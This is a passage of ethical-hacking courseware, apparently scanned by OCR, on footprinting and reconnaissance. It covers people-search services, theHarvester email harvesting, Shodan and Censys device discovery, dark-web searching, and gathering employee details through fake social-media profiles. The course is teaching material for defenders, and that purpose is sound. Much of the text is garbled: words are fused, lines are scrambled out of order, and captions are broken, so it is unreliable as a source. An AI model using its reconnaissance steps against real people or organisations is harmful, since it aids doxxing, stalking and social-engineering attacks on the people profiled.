ofPetes Tools ofmicrosoft
com
2
Modul 127
Page tical andCountermensores
Making by Comet
Copyright©
the Geographical
Finding Locationof the Target
the Geographical
Finding Locationof the Target
Informationsuchas the physical plays
locationof an organization a vital role i n the hacking
process.Attackerscan obtainthisinformation usingfootprinting.
In addition to the physical
location,
a hackercan alsoacquireinformationsuchas surrounding public Wi-Fihotspots that
mayoffera
way
to breakinto the targetorganization's
with theknowledge
Attackers of a targetorganization's
network,
locationmayattemptdumpster
diving,
surveillance, attacksto gather
socialengineering, andother non-technical more information
Oncetheattackersdiscern thelocationofthetarget,they c an obtaindetailed
satelliteimagesof
the locationusing various sources availableon the Internetsuchas Google Earthand Google
Maps. Theattackerscan usethisinformation to gainunauthorized accessto buildings,
wiredand
wirelessnetworks, andsystems.
Toolsfor Finding
the Geographical
Location
Thetoolsfor findingthe geographical
locationallowyou to find andexplore most locationson
the earth.They provideinformationsuchas imagesof buildings, as well as their surroundings,
includingWi-Fi networks.Toolssuchas Google Maps even locateentrances of the building,
securitycameras, and gates.Thesetools provide interactive maps,outline maps,satellite
own maps. Google
imagery,andinformationon how to interact with and create one’s Maps,
YahooMaps, and other tools providedrivingdirections,trafficconditions, landmarks, and
detailedaddressandcontact information,
Attackersmayuse toolssuchas Google Google
Earth, Maps,andWikimapia, to find or locate
entrancesto buildings,
security places
cameras,gates, to hide,
weakspotsin perimeter fences,
andutilityresources suchas electricity
connections,
to measure the distancebetweendifferent
objects,
andso on.
Modul
2 128
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
andReonnaiance
Feotgrting
=
Google
Earth(https://earth.google.com)
Attackersuse the Google thistool,
Earthtool to find the exact locationof a target.Using
attackerscan even access 3D imagesthat depict most of the populated Earth’s
surface
with a highresolution,The detail allowsattackersto obtain street views, altitude
information,andeven coordinates.
Figure2.28: of Google
Screenshot Earth
Modul
2 129
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
People SitesandPeople
Search on Social Networking Search
Services
"
Senterandtaseanpredaewant
|S
|
person
The neonsearch
cn providet ea
Information
about or on orpnitaton,
2 @‘
aaa
Searchon SocialNetworking
People Sites
Searching
for a particular
person on a socialnetworking
websiteis fairlyeasy.Socialnetworking
services are onlineservices, platforms,
or sites thatfocuson facilitating
the building
ofsocial
networksor socialrelationsamongpeople. Thesewebsitescontain informationthat users
provide They
in theirprofiles. helpto directly
or indirectly
relatepeople
to eachother through
various fieldssuchas common interests,worklocation,
andeducation,
Socialnetworking sites allow people to shareinformationquickly, as theycan update their
personal detailsin realtime. Suchsitesallowusersto update factsaboutupcomingor current
events,recent announcementsand invitations, and so on. Socialnetworking sites are a great
platform forfinding people andtheirrelatedinformation. Manysocialnetworking sites allow
visitors
networkingto
search
people on
for without registeringthe site;this makes
sites an easyandanonymous people
on searchingsocial
task.A user can search for a personusingthe name,
email,or address.Somesites allow users to checkwhetheran account Is active,whichthen
provides informationon the statusof the personbeing searched.
Socialnetworking sites suchas Facebook, Twitter,Linkedin, and Instagram allowyou to find
people byname, keyword, company, school,friends, colleagues,
andthe people livingaround
them.Searching
forpeopleon thesesitesreturns personal
information
suchas name, position,
organization
name,
professional
ID,photos,
current
location,
educational
qualifications.
also
and
informationsuchas companyor business,
videosandso on. Socialnetworking
In addition,
current location,
phone
you can
number,
find
email
sites suchas Twitterare usedto shareadvice,
ews, concerns,opinions,rumors, andfacts.Through people searching
on socialnetworking
services, an attackercan gathercriticalinformation that will helpthem in performing
social
engineeringor otherkindsof attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
2.39:Seeenshat
Figure showing
ofFacebook search
results
People
Searchon People
SearchServices
Youcan use public recordwebsitesto find informationaboutemailaddresses, phone numbers,
houseaddresses, andother information.Many individualsuse onlinepeople searchservices to
findinformationabout other people. Generally, online people searchservices suchas pipl,
Intelius,BeenVerified, Whitepages, and PeekYouprovide people’s
names, addresses, contact
details,date of birth,photographs, videos,profession, detailsabout theirfamily and friends,
socialnetworking profiles,propertyinformation, andoptional background on criminalchecks.
Further,onlinepeople searchservices may often reveal the profession of an individual,
businesses ownedbya person, upcoming projects and operating environment, websitesand
blogs,contact numbers, importantdates, companyemailaddresses, cellphone numbers, fax
numbers, and personal e-mailaddresses. Using this information,an attackercan try to obtain
bank details, creditcarddetails,pasthistory, and so on. This informationprovesto be highly
beneficialforattackersto launchattacks.Thereare many
that help i n obtaining
informationregarding people. available
online
Examples
peoplesearchservices
of suchpeoplesearch services
pipl,
includeIntelius, andAnyWho,
ical andCountermensores
Mackin ©by E-Comel
Copyright
People
searchservice Intelius
-
Source:https://www.intelius.com
‘Attackers
to
numbers,
can
use
the
addresshistory,
Inteliuspeople
thetargetorganization.
searchonlineservice to searchfor people
thisservice,attackersobtaininformation
Using
age,dateof birth,
relatives,
previous workhistory,
belonging
suchas phone
educational
background,
andso on
‘Search
results for Nicolas Cage
in United States)
2. Ncoas
cape,
EEXEEEEEEEED age
Screenshoto f ites
Figure2.20;
People
Search
ical andCountermensores
Mackin ©by E-Comel
Copyright
InformationfromLinkedIn
Gathering CEH
Informationfrom LinkedIn
Gathering
Linkedinis socialnetworking
a websitefor professionals. It connects the world’s
human
resourcesto andsuccess.Thesite contains personal
aid productivity informationsuchas name,
position, name, current location,
organization educationalqualifications,
andso on. Information
gathered fromLinkedinhelps a n attackeri n performing socialengineeringor otherkindsof
attacks.
Attackerscan use theHarvestertool to gather
informationfrom Linkedinbasedon the target
organization
name:
theHarvester
Source:http://www.edge-security.com
theHarvesteris a tool designed
usedforopen-source
threat landscape
intelligence
to be usedi n the early
gathering
andhelps of
stagesa penetration
to determinea company's
on the Internet. Attackersuse thistool to perform
test. It is
external
enumeration on the
Linkedinsocialnetworking site to findemployees ofthetargetcompanyalong withtheir
jobtitles.
‘As
on LinkedIn: the uses
shownin thescreenshot,attacker thefollowing
command
to enumerate users
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackerssearcho n LinkedIn
theHarvester
sng
search resultfram Unkedin
Harvesting
Email Lists
Harvesting
Email Lists
Gathering
emailaddresses
relatedto the targetorganization
actsas an attackvector
important
during
thelaterphases
ofhacking.
Attackers
can use automated
toolssuchas theHarvester
and
Email Spiderto collect publicly
availableemail addresses of the employeesof the target
Thesetoolsharvestemaillistsrelatedto a specified
organization. domainusingsearchengines
suchas Google,Bing,andBaidu.Attackersuse theseemaillistsandusernamesto perform social
engineeringandbruteforceattackso n the target
organization.
=
theHlarvester
Source:http://www.edge-security.com
Attackersuse theHarvester tool to extract emailaddresses
relatedto the targetdomain,
For example, attackersu se the following command to extract email addressesof
microsoft.com usingthe Baidusearchengine:
theharvester -d microsoft.com -1 200 -b baidu
Inthe above
command,
to -b
tells
the results 200,and
-d specifies
engine;alternatively,
thedomainusedfor harvesting the emails,
-| will mit
theHarvesterto extract the resultsfromthe Baidusearch
you can use Google,
Bing, etc.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
2.23
Screenshot showing
theHarvester
command
extract
to
email addresses
4
ing
emails
extracted
the bytheHarvester
InformationfromFinancialServices
Gathering
lad &
Informationfrom FinancialServices
Gathering
Attackerswhoseekaccess to personal
informationor financialinformationoftentargetfinancial
datasuchas stockquotes
andcharts, news, andportfolios.
financial Financial
services suchas
Google
Useful
Finance, MSNMoney,
information
details,
stockexchange
YahooFinance,
rates,corporate
andInvesting.com
suchas the marketvalueof a company’s
pressreleases,
shares, a
can providelarge
companyprofile,
financialreportsalong
amount of
competitor
with news,and
blogsearcharticlesaboutcorporations.Theinformationprovided varies fromone service to the
other.Financialfirmsrelyon webservices
accounts. Attackerscan
malware,exploiting
to perform
transactions
users
obtainsensitive and privateinformation
flaws,breaking
software design
access
andgrant
regarding by
authenticationmechanisms,
to their
thesefirms
service
using
flooding,
andperforming bruteforceattacksandphishing
attacks.
Google Finance
Source:https://www.google.com/finance
The Google finance service featuresbusinessand enterprise headlinesfor many
corporations,
including
their
financial
is alsoavailable,
corporate
decisionsandmajornews events. Stockinformation
as are stockpricechartsthat contain marksfor majornews events and
actions.Thesite alsoaggregates Google news andGoogle blogsearcharticles
abouteachcorporation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Google
225;Screenshot
Figure Service
Finance
ical andCountermensores
Mackin ©by E-Comel
Copyright
Footprinting JobSites
through
‘company
det
can
be
atere
ob
infastructue ram postings
Footprinting JobSites
through
can gather
‘Attackers valuableinformationabout the operating
system,softwareversions,
company’s
infrastructuredetails,anddatabase schema of an organizationthrough footprinting
jobsitesusingdifferenttechniques. Manyorganizations’
websitesprovide recruiting information
on a jobpostingpagethat,i n turn,reveals
hardwareandsoftware information, network-related
Information,andtechnologies usedbythe company(e.g,, firewall,internalserver type,OSused,
network
appliances,
on.).
addition,
addresses.
organization
website
employee
email
andso In the mayhavea key
advertisesa NetworkAdministratorjob,i t poststhe requirements
list with
Suchinformationmayprove to be beneficialfor an attacker.For example, if an
relatedto that
position,
Further,
attackersc an go through employee resumesposted on jobsitesandextract information
suchasa n individual'sexpertise,
employee
educationalqualifications, andjobhistory.
can revealtechnicalinformationaboutthe targetorganization.
technicalinformationobtainedthrough jobsites suchas Dice,Linkedin,
The history
job of an
Attackerscan use the
and Simply Hired to
detectunderlying vulnerabilitiesi n the targetITinfrastructure.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Ente
pplestins
Sever
T5/et nth yarn
Epne Cle Enger a
valuable
information
2.26;Screenshotof jbpostingshowing
Figure
Module
Page
2 140
tical
Making
and by Countermensores Comet
Copyright©
Deepand Dark Web Footprinting
Deepw ed
andDarkWebFootprinting
Deep
andcontentusing of Search
regular user
Thesurfaceweb is the outer layer theonlinecyberspace
engines
usethat
are
webbrowsers.
toaccessanddownloadwebpages.Thesurface
thatallowsthe to findweb pages
crawlers programmed
webcan beaccessed
bots
bybrowserssuchas Google
Chrome, MozillaFirefox,andOpera.
Thedeep webis thelayer oftheonlinecyberspace thatconsistsofwebpagesandcontent that
are hiddenandunindexed. Suchcontent cannot belocatedusing traditionalwebbrowsersand
search engines.Thesize of the deepwebis incalculable,
and it expands to almostthe entire
WorldWideWeb.Thedeep webdoesnot allowthe crawlingprocessof basicsearchengines. It
consistsof officialgovernment or federaldatabases andotherinformation linkedto various
The deep
organizations. web can beaccessed using searchenginessuchas TorBrowserandthe
WWWVirtual Library. It can be used for bothlegal
andillegalactivities.
Thedarkwebor Darknetis a deeper layeroftheonlinecyberspace,andit is thesubsetofthe
deep
web
that
enables
anyone
anonymously
without
onlythrough
beaccessed
webto perform
being
traced.
to navigate
specialized
footprinting
toolsor darknet
browsers.
on the targetorganization
Attackers
Thedarkwebcan
primarily usethedark
andlaunchattacks.Thedarkwebcan be
accessed
usingsearch
enginessuchasTorBrowserandExoneraTor.
Attackers
can use deep and dark websearching toolssuchas Tor Browser, ExoneraTor,
and
OnionLand
details,
Searchengine to gather
information,
passports
andSocialSecurity
Numbers(SSNs).
confidential credit
identification
informationaboutthe target,suchas
medical
carddetails, records,
Withthe helpof this information,
card
socialmediaaccounts,
theycan launchfurther
attacks
o n thetargets.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
TorBrowser
Source:https://www.torproject.org
TorBrowseris usedto access the deep
anddarkweb,
whereit acts as a defaultVPNfor
theuser andbounces through
thenetworkIP address severalservers beforeinteracting
with theweb.Attackersuse thisbrowserto access hiddencontent,unindexedwebsites,
andencrypteddatabases present in the deepweb.
shownin the screenshot,
‘As
hiddeninformationaboutthe target
attackers
byusingTorBrowser,
organization.
can obtain
more
detailed and
Microsoft
Figure2.27:
Screenshot
of TorBrowser
ical andCountermensores
Mackin ©by E-Comel
Copyright
the Operating
Determining System
the Operating
Determining System
Attackersuse various onlinetoolssuchas Netcraft, Shodan,andCensys to detectthe operating
system usedat the targetorganization. Thesetoolssearch theInternetfordetecting connected
as servers, to
devicessuch routers,
the andloTdevicesbelonging target
tools,attackersobtain information
operating
Using
organization. these
suchas the city,country,latitude/longitude,
system,and IP addressof the targetorganization.
hostname,
Suchinformationfurther helps
attackersi n identifyingpotentialvulnerabilitiesandfinding
effectiveexploits
to performvarious
attackson the target.
Netcraft
Source:https://www.netcraft.com
Thetechniqueof obtaining
information
about the targetnetworkoperating systemis
calledOSfingerprinting.
Open https://www.netcraft.com
in the browserand typethe
the ofidentify
domainname the target
Netcraft
tool
operating
to
system
networki n the What'sthat site running?
al thesitesassociated
runningat eachsite. the
with target
field.Attackersuse
domainalong with the
ical andCountermensores
Mackin ©by E-Comel
Copyright
SearchWebbyDomain
=
Search
SHODAN Engine
of
Netcraft
228:Screenshot
Figure showingtarget system
operating
Source:https://www.shodan.io
Shodanis a computersearchengine that searches
the Internet for connecteddevices
(routers, Youcan use Shodan
servers, andloT.). to discoverwhichdevicesare connected
to are
wherethey located,
the Internet, andwho is using
them.
ical andCountermensores
Mackin ©by E-Comel
Copyright
attackers
It helps
accessible
to keep trackof all the devices on the targetnetworkthat are directly
to
fromthe Internet. It alsoallowsthe attacker find devicesbasedon the city,
country,latitude/longitude,hostname, operating
system,
and
IP
address.
the attacker to searchfor known vulnerabilitiesand exploits
Metasploit, CVE,
OSVD8, andPacketstorm with a single
it
interface.
Further,helps
a cross ExploitOB,
EiMicrosoftOfficialHomePage*
-
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Censys
Source:https://censys.io
Censys
monitors the infrastructureand discoversunknownassets anywhere
on the
Internet.It provides
a full view of everyserver anddeviceexposed to theInternet
Attackersuse thistool to monitor the targetITinfrastructureto discovervarious devices
connectedto the Internet along with their detailssuchas the operatingsystem used,IP
address,protocols used,andgeographical location,
EXSY
Ccensys
(ns563444.ip-192-99-7.net)
192.99.7.58
gure Screenshot
2.30: of Censs
Search
Engine
showing
targetoperating
ical andCountermensores
Mackin ©by E-Comel
Copyright
VoIPand
VPN
Footprinting SHODAN
through
VoIPandVPNFootprinting SHODAN
through
Source:https://www.shodan.io
Shodanis a searchenginethat enablesattackersto perform footprinting
at various levels.It is
usedto detect
footprinting
information.
devices
and networks
can deliver various
The following
with vulnerabilities,A searchin Shodan
results,
screenshots
which will helpgather
forVoIPandVPN
VPN- and VolP-related
showsome of the VPNandVoIP footprinting search
resultsobtainedthrough Shodan
Modul
2 147
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Figure2.31:
Screenshot
ofSHODAN
search
engineshowin
VoIP
results
Figure
232:Sreenshat
ofSHODAN
search
VPN showing ruts
engine
ical andCountermensores
Mackin ©by E-Comel
Copyright
Competitive
Intelligence
Gathering
(©Compete intligence
is
your
gatheringtheproceso f ientyng gxthering
informationabout emptor fm resources, such
‘sing
onalyzng,
S he Internet
and
verifying
TDscoteneneeneenpires
BEces star
and seen
Competitive
Intelligence
Gathering
(Cont'd)
WhenDidthis
Bogin?
H ow
DiaCompany
it Develop? Say What
Are the
Company's
Plans?
ExpertOpinions
‘What
the Company?
‘bout
|G Information
Resource
Sites
Resource
Stes Resource
.
Sites
Information © Information
cm Walstret
Tanscipt T he
tI oor tonyAewneat cme tito otenonmetecom
telex com
Aayironn
cibat ©
Competitive
Intelligence
Gathering
Competitive gathering
intelligence of identifying,
is the process gathering, verifying,
analyzing,
andusinginformationaboutyour competitors fromresources suchas the Internet. Competitive
intelligence
means
understanding
and
learning
as possible. about
other
businesses
competitiv
It is non-interfering
theft carried out via hacking
andsubtlei n nature compared
or industrial
to become as
to directintellectualproperty
espionage.It focuses o n the externalbusiness
ical andCountermensores
Mackin ©by E-Comel
Copyright
professionals
environment. In this method, information
gather andlegally
ethically insteadof
gathering
it secretly.
Competitive
intelligence
helps
What are
‘=
doing?
in
the competitors
determining:
=
Howcompetitors their products
are positioning andservices?
=
Whatcustomersare sayingaboutcompetitors’
strengths
andweaknesses?
Companies either byemploying
carry out competitiveintelligence peopleto search for
informationor byutilizing
a commercial databaseservice, whichinvolveslower costs. The
informationthatisgathered
can help the managersandexecutivesof a companymakestrategic
decisions.
Intelligence
of Competitive
Sources
Intelligence
Competitive gathering
can beperformed
usinga director indirect
approach,
Direct Approach
Thedirectapproach intelligence
serves as the primarysource for competitive gathering,
Directapproach techniques
include gathering
informationfrom trade shows,social
engineeringof employees
andcustomers,andso on.
IndirectApproach
Through an indirectapproach, is gathered
informationabout competitors using online
resources. Indirect
‘Company
approach
websites
techniques
include:
andemployment ads
Support threadsandreviews
Search andonlinedatabase
engines,Internet,
Socialmediapostings
Pressreleases
andannualreports
Trade conferences,
journals,
Patentandtrademarks
andnewspapers
andretailoutlets
Productcatalogs
Analyst
andregulatory
reports
Customer andvendorinterviews
distributors,
Agents, andsuppliers
Industry-specific
blogs andpublications
Legal
databases,
e.g,,LexisNexis
informationdatabases,
Business .g,, Hoover's
Onlinejobpostings
ical andCountermensores
Mackin ©by E-Comel
Copyright
Competitive IntelligenceWhenDidthisCompany
-
Whohelps
leadsit?
Thisinformation a companylearnaboutthecompetitor's
decision-makers,
Where i s it located?
Competitive
intelligence
alsoincludesthe locationof the companyand information
relatedto various branches
andtheir operations.
Attackers gathered
can use the information through intelligence
competitive to builda hacking
strategy.
InformationResourceSites
resource sitesthathelp
Information include:
intelligence
to gaincompetitive
=
EDGAR Database
Source:https://wwwsec.gov/edgar
shtml
The ElectronicData Gathering, Analysis,and Retrievalsystem(EDGAR) performs
automatedcollection, validation,indexing,acceptance, andforwarding ofsubmissions by
companies and otherswho are required bylaw to file with the U.S.Securitiesand
Exchange Commission (SEC).
of the securitiesmarketfor the benefitof investors,
accelerating the receipt,acceptance,
corporations,
dissemination, and analysis
and
It primarypurposeis to increasethe efficiencyfairness
andthe economy by
of time-sensitive
corporate informationfiledwiththe agency
D&B
Hoovers
Source:http://wwhoovers.com
D&BHooversleverages
a commercial
database
of 120 millionbusiness
records
and
analytics
to deliver a salesintelligence
solution that enablessalesand marketing
professionals
to focus theright
for their business on
so that they
prospects c an generate growth
immediate
ical andCountermensores
Mackin ©by E-Comel
Copyright
LexisNexis
Source:https://www.lexisnexis.com
LexisNexisprovides content-enabledworkflow solutions designed specifically
for
professionals
i n the legal,
riskmanagement, corporate, government, law enforcement,
accounting,and academicmarkets.It maintains a n electronicdatabaseof information
to
related
legal
of legal,and
public
enables
customers
records.
news, and business
agenciesseeking data analytics
it
supporting
to accessdocuments
compliance,
andrecords
sources. It is beneficialfor companies and government
customeracquisition,fraud
detection,healthoutcomes, identity solutions,
investigation,receivables
management,
riskdecisioning,andworkflowoptimization.
Business
Wire
Source:https://www.
businesswire.com
Business Wire focuseson press releasedistributionand regulatory disclosure.This
companydistributesfull-textnews releases,photos,andothermultimedia content from
across the globe
various organizations to journalists,
news media,financialmarkets,
investors,
information
website,
databases,
audiences.
has
electronicnetworkthrough
andgeneral
whichit releasesn ews.
It its own patented
Factiva
Source:https://www.dowjones.com
Factivais a global
news database andlicensedcontent provider. It is a business
informationandresearch
tool that getsinformationfromlicensedandfree sourcesand
provides
capabilities
suchas searching,
alerting, andbusiness
dissemination, information
Factivaproducts
management. provide
access to more than 33,000 sources suchas
licensedpublications, blogs,
influentialwebsites, images,andvideos.Its resources are
madeavailablefromnearly
600 continuously
updated in worldwide28languages,
everycountry
newswires.
including more than
Competitive
- attackers
Intelligence Company's
WhatAre the
Informationresource sitesthat help
Plans?
gaina company’s plans
business include:
=
MarketWatch
Source:https://www.marketwatch.com
MarketWatch of marketsfor engaged
tracksthe pulse investors. Thesite is an innovator
in business financeinformation,
news, personal real-timecommentary, and investment
toolsanddata,with journalists
generatingheadlines,
stories,videos, andmarketbriefs.
TheWallStreetTranscript
Source:https://www.twst.com
TheWallStreetTranscript
is awebsiteas well as a paidsubscription-based
publication
that publishes
industry the views of moneymanagers
reports.It expresses and equity
ical andCountermensores
Mackin ©by E-Comel
Copyright
analysts sectors. Thesite also publishes
of differentindustry interviews with CEOs
of
companies.
Alexa
Source:https://www.alexa.com
Alexais a
©
great
tooldeep
analytics users
to dig into the of othercompanies.
byuncovering
Discoverinfluenceroutreachopportunities sites
It allows
that link to
to
their
competitorsusingCompetitor Backlink
Checker.
Benchmark
Competitive competitors
andtracktheircompany’s
Intelligence
Tools.
performance
relativeto their using
Euromonitor
Source:https://www.euromonitor.com
Euromonitorprovides researchcapabilities
strategy for consumer markets.It publishes
reports consumers,and demographics.
on industries, It providesmarketresearchand
surveysfocused
on theorganization's
needs
Experian
Source:https://www.experian.com
provides
Experian
competitors’
insights
into
search,display,
andmetricsto improvemarketing
strategies
marketing affiliate, andsocial
results.It allowstheuser to:
campaign
©
Benchmark
the
effectiveness
driving
of customeracquisition
competitors’
Determine whatis
existing
success
strategies
ical andCountermensores
Mackin ©by E-Comel
Copyright
reach, monthly
clickrates and CPCs, marketshare,trademark
ad spending, use, and
affiliate activity.
usPTO
Source:https://www.uspto.gov
TheUnited StatesPatent andTrademark Office(USPTO) informationrelatedto
provides
patentandtrademarkregistration. It providesgeneral
informationconcerningpatents
andsearchoptions for patentsandtrademarkdatabases.
CompetitiveIntelligence
-
WhatExpert OpinionsSayAbouttheCompany?
Informationresource sites that helpthe attacker
to obtain expertopinionsaboutthe target
company include:
=
SEMRush
Source:https://www.semrush.com
SEMRush keyword
is a competitive research tool.It can provide a listof Googlekeywords
andAdWordsfor any site,as well as a competitor list i n the organicand paidGoogle
searchresults.It enablesan approach for gainingin-depth knowledge about what
competitors are advertising
andtheir budget allocationto specific Internet marketing
tactics.
AttentionMeter
Source:http://www.attentionmeter.com
AttentionMeteris a tool for comparingwebsites (traffic)byusingAlexa, and
Compete,
Technorati,It givesa snapshot fromAlexa,
of trafficdataaswell as graphs Compete,
and
for
Technorati the specified
Global
ABI/INFORM
websites.
Source:https://www.proquest.com
‘ABI/INFORM
Globalis a business ABI/INFORM
database. Globaloffersthelatestbusiness
andfinancialinformationfor researchers.
WithABI/INFORM
Global,
users can determine
business
conditions,
management
theory, techniques,
andtactics,
strategy
corporate
business
trends,
andthe competitive
management
landscape.
and
practice
Similarweb
Source:httpsi//www.similarweb.com
SimilarWeb aggregates datafrom multiple sources to estimate traffic,
geography,
and
referraldatafor a company’s
websitesandmobileapps.It also provides a panel
through
a browserextension that allowsrefining other data sources byanonymously tracking
browseractivityacross millionsof browsers
worldwide.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Other Techniques
for Footprinting
through
Web Services
PLE?| wetscmpmen
terse te eet mise
stig
one|*
tegetinnnaras rnp inn noha
Information Gathering
UsingGroups,Forums, 28
system
forums,
Groups
a
and blogs
information,andpersonal
information
about tage, suchas publinetwork
sensitiveinformation
provide information,
wth
fake Yahoo
Aatackers
groups,
register
tc. the i n Googegroups,
profiles andty tojoin target
Using
NNTP InformationGathering UsenetNewsgroups
topisa ofor
Usenetnewsgroupis repository
containing a coletion notes messages
on various su
tht are submitedbythe users ever te Internet
-xackcscan search
theUsenetnewsaroups,s uch andEweka,
as Newshostng to findalable information
re
Other Techniques for FootprintingthroughWebServices Ao
‘=
Information Gathering
Using ProfileSites
Business
Finding
usefulinformationfromcorporate websitesis a necessary
stepi n the information
gatheringphase.Thesebusinessprofilesitescontain businessinformation of companies
regionwith their contact information,
locatedin a particular whichcan be viewedby
anyone.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers use businessprofile
sites suchas opencorporates, Crunchbase,and
to gather
corporationwiki informationaboutthe targetorganizations,
important suchas
theiraddresses,
contact
information
location,
database,
‘employee departmentnumbers,
(such phone
email
addresse
names,typeof service provided,
as
andtypeof industry.
ose e
opencorporates
fscx
| omco
Found
728 companies oggo
ao
o-oo
Figure2.3:Screenshot
of opencorporates Search
showing ests ofMlrosoft
‘Monitoring
Targets Alerts
Using
Alertsare content monitoring automated,
services that provide up-to-date information
basedon user preference,
on thewebsiteandprovide
services automatically
via SMS.
usually emailor To receive alerts,
eitheran emailaddress or a phone
a user must register
number.Onlinealert
notifyusers whennew content from news, blogs, anddiscussion
groupsmatches a set ofsearch terms selectedbytheuser. These services provideup-to
date informationabout competitors andthe industry. Alertsare sent via emailor SMS
notifications
Toolssuchas Google Alerts,Twitter Alerts,and GigaAlerts helpattackersto track
mentions of the organization’s
name, membernames,website, or any people
or projects
that are important.Attackerscan gatherupdated informationabout the target
periodically
fromthe alert services anduse it for furtherattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Alerts
Google
Source:https://www.google.com/alerts
Google Alertsautomatically
notifiesusers when new content from news, websites,
blogs,videos, discussion
and/or groupsmatches a set ofsearchterms selected
bythe
user andstoredbythe Google
Alertsservice.
Figure2.34 of Google
Sereenshot Alert
Microsoft
Com
Figure of Google
2.35:Screenshot AlertPreview
ical andCountermensores
Mackin ©by E-Comel
Copyright
OnlineReputation
Tracking oftheTarget
Online Reputation
Management(ORM)is a process of monitoringdisplayswhen
someone searchesfor your company’s
reputationon the Internet. ORM then takes
searchresultsor reviews. Theprocesshelps
measuresto minimize negative to improve
brandreputation.
Companies oftentrackthe public feedback givento themusingORMtracking toolsand
then take measures to improve their credibilityand retain their customers’
trust. For
positive onlinereputation management, organizationswill often try to be more
over
the This help collect
transparent Internet. transparency
informationaboutthe target organization,
may theattackerto genuine
OnlineReputation TrackingTools
Onlinereputation tracking helpus to discoverwhatpeople
tools are sayingonlineabout
the company's brandi n real time across the web,socialmedia, and news. They helpi n
monitoring,
measuring, one’s
andmanaging online.
reputation
Anattackermayuse ORMtrackingtoolsto:
Tracka company’s
onlinereputation
Collecta company’s
searchengineranking
information
Obtainemailnotifications
whena companyis mentioned
online
Trackconversations
Obtainsocialnews aboutthe targetorganization
Mention
Source:https://mention.com
tracking
Mentionis an onlinereputation tool thathelps theweb,
attackersi n monitoring
socialmedia,forums, and blogsto learn more aboutthe targetbrandand industry. As
thistoolhelps
showni n thescreenshot, attackersi n trackingonlineconversationsasthey
happen, wherevertheyhappen. Using Mention, attackerscan have live,up-to-date
reportsdelivered
to anyemailaddress i n realtime.
ical andCountermensores
Mackin ©by E-Comel
Copyright
236:Screenshot
Figure of Mention
InformationGathering
Using and Blogs
Forums,
Groups,
Many Internetusersuse blogs, groups,andforums forknowledge sharing For
purposes.
thisreason,attackersoftenfocuson groups,forums, andblogs to findinformationabout
a targetorganizationandits people.
of informationthat employees
discussions,
generally
monitor
Organizations fail to
reveal to other users i n forums,
Attackerssee this as an advantage
theexchange
blogs, and group
andcollectsensitive informationabout
the target,suchas publicnetwork information, systeminformation, and employee
personal information.Attackerscan register with fake profiles i n Googlegroups,Yahoo
‘Broups,
to
join
target
organizations
groups,
andso on. They
can obtainpersonal where
try the employee
andcompany information.Attackerscan alsosearchfor information
they
forums,
blogs
in groups,
FullyDomain
Names
(FQDNs},
and
and
by Qualified IPaddresses,
Employee
informationthat an attackercan gather and blogs
from groups,forums, may
include:
©. Fullname
oftheemployee
Placeof workandresidence
Home telephone,
cellnumber,
or officenumber
andorganizational
Personal emailaddress
ical andCountermensores
Mackin ©by E-Comel
Copyright
Picturesof the employee
residenceor work location that includeidentifiable
information
Picturesof employee
awardsandrewards or upcominggoals
Google
Groups
str yourone
Fw
‘Al
of discussions
in place
Cheon
a gous mean
discuss power
Figure2.37: of Google
Sereenshat Groups
InformationGathering
Using
NNTPUsenet Newsgroups
Usenetnewsgroup
i s a repository a collection
containing of notes or messages
on various
subjectsand topicsthat are submittedbythe users over the Internet.NetworkNews
TransferProtocol(NNTP) is used to relay
Usenet news articlesfromthe discussions
over
the newsgroup.
the target.
newsgroups.
Usenetnewsgroups
People
Many
seekhelp byposting
professionals
and asking
questions
use the newsgroups
of
can bea usefuls ource valuable informationabout
for a solutionon Usenet
to resolvetheirtechnicalissuesby
postingquestionson Usenet.To obtainsolutionsfor theseissues,s ometimes they post
more detailedinformation aboutthe targetthanneeded.Attackerscan searchUsenet
newsgroupsor mailinglistssuchas Newshosting,Eweka,andSupernews to findvaluable
informationaboutthe operatingsystems, web servers,etc, usedbythe target
software,
organization,
ical andCountermensores
Mackin ©by E-Comel
Copyright
For example, fromthe screenshotgiven below,you can understand that the target
organizationis usinga RedHat Linux6.2 machinethat is running Apacheweb server
1.3.23,Thisinformation helps
attackersi n performing
web server andweb application
attacks.
Figure238:
sample
Screenshot
of
posting
USENET
newsgroup
ical andCountermensores
Mackin ©by E-Comel
Copyright
Collecting
Information through on Social
Social Engineering
NetworkingSites
(©Astachers
we
engineering
soci ick to ter senate normation websites
rom soc networking
|e aches
rest fake proteanthenee thefae ent to ureemployees
it thee
eveing senate information
— ||
ftyttmaymenten,
Siueptowsandwien
or pees ritoyes
es on ou neat
Vern
Sao
alee
aes
eae events
throughSocial Networking
Footprinting Sites
Whilefootprinting
through
socialnetworking
sites mayseem similarto footprinting
through
revealing
is greater
information,
detail
socialengineering (whichdiscussed
the two methods.In footprinting
in
through
later),
socialengineering,the attackertrickspeople
whereasi n footprinting
through socialnetworking
thereare some differences
into
sites,the attacker
between
gathersinformation
available
o n thosesites.Attackers
can even use social
networking sitesas a
toperform
medium
social
engineering
attacks, networking
This
section
social andhow
engineering of
explains
itcbe
an
the type information one
obtained.
aims
familiarize
locating
informatio
fromsocialmediasitesusingvarious onlineservices
It
can collectfromsocial
to
andresources,
youwith
sites using
Information through
Collecting SocialEngineering
on SocialNetworking
Sites
Socialnetworking sitesare onlineservices,platforms, or othersitesthatallowpeople to connect
and to build interpersonal relations.The use of socialnetworking sites is increasingrapidly.
Examples
of
such sites includeLinkedin,
so on. Eachsocialnetworking
friends, family
Facebook, Instagram, Pinterest,
site hasits own purpose and features.
and so on, while another helps
Twitter,
YouTube, and
One site may connect
u sers to shareprofessional profiles.Social
networking sitesare open to everyone. Attackersmay take advantage of thisfeatureto gather
sensitive information fromuserseitherbybrowsing through users’
public profiles
or bycreating
a fake profile to poseas a genuine user. Onsocialnetworking sites,people may postpersonal
information suchas date of birth,educational information, employment background, spouse's
names,
and
so
upcomingnewson.
Organizations
often
about post
information
